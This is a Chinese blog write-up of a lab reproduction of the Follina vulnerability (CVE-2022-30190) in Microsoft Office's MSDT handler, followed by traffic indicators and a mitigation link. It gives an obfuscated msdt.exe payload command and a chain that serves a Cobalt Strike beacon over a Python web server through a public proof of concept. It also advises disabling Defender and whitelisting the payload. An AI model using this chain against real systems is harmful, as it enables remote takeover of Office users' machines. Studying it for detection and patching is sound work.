CVE-2022-30190 MSDT远程代码执行漏洞复现
目录
0x01 声明:
0x02 简介:
0x03 漏洞概述:
0x04 影响版本:
0x05 环境搭建:
0x06 漏洞复现:
是否存在利用点:
CMD执行:
生成docx文件利用:
0x07 CS上线:
启动CS服务端:
CS客户端连接:
设置监听:
生成攻击exe:
宿主机启动8080服务:
利用POC
修改POC:
启动POC
文件放到Windows 10虚拟机
宿主机日志:
CS客户端上线:
0x08 流量分析:
MSDT流量:
0x09 修复建议:
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Microsoft Office 是由 Microsoft (微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint 等。
0x03 漏洞概述:
Microsoft Office 存在远程代码执行漏洞,攻击者可通过恶意 Office 文件中远程模板功能从服务器获取恶意 HTML 文件,通过 'ms-msdt' URI 来执行恶意 PowerShell 代码。另外,该漏洞在宏被禁用的情况下,仍能通过 MSDT(Microsoft Support Diagnostics Tool)功能执行代码,当恶意文件保存为 RTF 格式时,甚至无需打开文件,通过资源管理器中的预览选项卡即可在目标机器上执行任意代码。
0x04 影响版本:
Microsoft Office 2016、Microsoft Office 2021(其他版本有待确认)
0x05 环境搭建:
Windows 10虚拟机(一定要把Windows Defender关闭)
参考这篇文章:
彻底关闭Windows Defender&Windows 更新_Evan Kang的博客-CSDN博客
Windows 10 宿主机
Kali 虚拟机
POC1:
https://github.com/chvancooten/follina.pyhttps://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501
POC2:
https://github.com/JohnHammond/msdt-follinahttps://download.csdn.net/download/qq_44281295/86727749?spm=1001.2014.3001.5501
0x06 漏洞复现:
是否存在利用点:
CMD执行:
msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
生成docx文件利用:
0x07 CS上线:
启动CS服务端:
chmod +x teamserver
./teamserver ip key(key为密钥,客户端连接时候使用)
CS客户端连接:
设置监听:
点击“Cobalt Strike”–“Listeners”—“Add”—输入“ Name” —添加“HTTP Hosts”—点击“Save”
生成攻击exe:
点击“Attacks”—“Packages”—“Windows Executable”—点击“…”—选择“test”—点击“Generate”—选择一个路径存放exe(注意加白,会被杀。)
宿主机启动8080服务:
主要目的是让被害主机从这个服务上下载CS生成的exe。
python -m http.server 8080
利用POC
POC地址:xxx
修改POC:
启动POC
python follina.py -i 192.168.18.130 -p 8000 -r 6000
文件放到Windows 10虚拟机
(注意加白,会被杀软干掉。)
宿主机日志:
宿主机8080会收到一条下载成功的日志
CS客户端上线:
0x08 流量分析:
(请求CS生成exe应该在VPS上的,测试环境中在攻击者这边生成比较方便)
MSDT流量:
在流量分析中,发现只会有几种请求头:
User-Agent: Microsoft Office Protocol Discovery
User-Agent: Microsoft Office Word 2014
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
伴随着的请求方式有:
HEAD 请求路径为 “/index.html”
OPTIONS 请求路径为 “/”
0x09 修复建议:
目前可参考官方文档禁用 MSDT URL 协议或通过 Microsoft Defender 检测和保护系统。
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
CVE-2022-30190 MSDT远程代码执行漏洞复现相关推荐
- CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
文章目录 免责声明 前言 一.漏洞简介 风险等级评判 二.影响版本 office版本 三.漏洞复现 复现环境 工具 使用方法 利用 第一种 第二种 防范避免 结尾 参考 免责声明 本文章仅供学习和研究 ...
- Office 远程代码执行漏洞复现过程
本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...
- [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御
摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...
- ThinkPHP 5.0.23 远程代码执行 漏洞复现
ThinkPHP 5.0.23 远程代码执行 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1. 环境搭建 2. 漏洞复现 四.漏洞POC 五.参考链接 六.利用工具 一.漏洞描述 ThinkP ...
- 用友NC BeanShell远程代码执行漏洞复现
用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...
- IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现
CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...
- CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞
CVE-2022-30190 https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-supp ...
- cve-2017-12617 tomcat远程代码执行漏洞复现测试
0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操 ...
最新文章
- 拿到腾讯字节快手 offer 后,他的 LeetCode 刷题经验在 GitHub 火了!
- 计算机科学中抽象的好处与问题—伪共享等实例分析
- System.Data.SqlClient.SqlException:“对象名 'customer' 无效。
- 阿里云中间件技术 促进互联网高速发展
- Linux报错:Syntax error: “(“ unexpected解决办法
- http status 404 – 未找到_从零开始搭建自己的网站004添加404处理页面
- c++ 字符串拼接_字符串拼接新姿势:StringJoiner
- python3 一些常用的数学函数
- 剑指offer——10.斐波那契数列
- sim868 建立tcp链接时的步骤所对应hex码
- mentohust找不到服务器 重启认证,mentohust官方使用说明(全+转)
- Hexo主题-Icarus主题
- HC05蓝牙模块AT指令与手机蓝牙控制STM32板载LED
- php手册3.1,thinkphp3.1手册下载|thinkphp3.1手册(thinkphp3.1开发手册chm版下载)_星星软件园...
- 叉乘点乘混合运算公式_小学数学所有公式和顺口溜都在这里了,假期让孩子背熟!...
- docker-compose 搭建 Rap2 接口管理平台
- vue 路由history模式打包部署 The requested URL * was not found on this server. 的解决方法
- 宗镜录略讲——南怀瑾老师——系列11
- ev3 c语言高级编程,EV3运行原生C语言程序实例
- 一盆惨遭毒手的肉——记,那一次和小鲜肉的邂逅
热门文章
- Unity 编辑器开发实战【Editor Window】- 关于提高Proto通信协议文件生成效率的考虑
- 苹果手机可以测试Android,苹果手机可以运行Android 10,只能简单测试,会开启新时代吗...
- 巫师3怎么释放替换法印_巫师3替换法印模式 | 手游网游页游攻略大全
- Ubuntu下如何打开/关闭 触摸板
- Bootstrap 快速人门案例——前端最火的插件
- CAD 绘制圆角处理
- 程序员晋升架构师的十项必备技能
- CTF之路:关于HTTP $_GET方法中使用base64加密传值
- IKA文档文件管理工具(文档内文全文搜索+自动识别内文标签分类+目录管理)-桌面版(原创)
- el-image加载图片初始化加载失败问题